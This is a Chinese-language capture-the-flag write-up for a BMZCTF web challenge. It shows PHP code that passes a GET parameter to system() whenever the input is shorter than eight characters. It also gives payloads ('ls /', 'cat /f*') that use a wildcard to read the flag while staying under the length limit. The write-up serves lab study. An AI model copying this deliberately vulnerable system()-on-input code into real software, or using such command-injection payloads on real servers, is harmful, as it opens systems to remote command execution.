BMZCTF-WEB-rcee

BMZCTF-WEB-rcee

<0|1>代码

<?php
    $sandbox = md5("box".$_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']);
    echo "you are in sandbox: ".$sandbox."<br/>";
    @mkdir($sandbox);
    chdir($sandbox);
    $command = $_GET['command'];
    if(strlen($command) < 8){
        system($command);
    }
show_source(__FILE__);

<0|2>知识点

system():执行系统命令，但是题目要求输入字符小于8才能执行

<0|3>预期解答

查看当前目录下面有没有flag

payload：/?command=ls /

明显flag在当前目录，但是如果使用cat /flag 会因为字符串长度超过8而执行失败

所以这里要使用模糊文件名

payload：/?command=cat /f*

posted @ 2021-06-08 17:19 AsPwn 阅读(80) 评论(0) 收藏举报

刷新页面返回顶部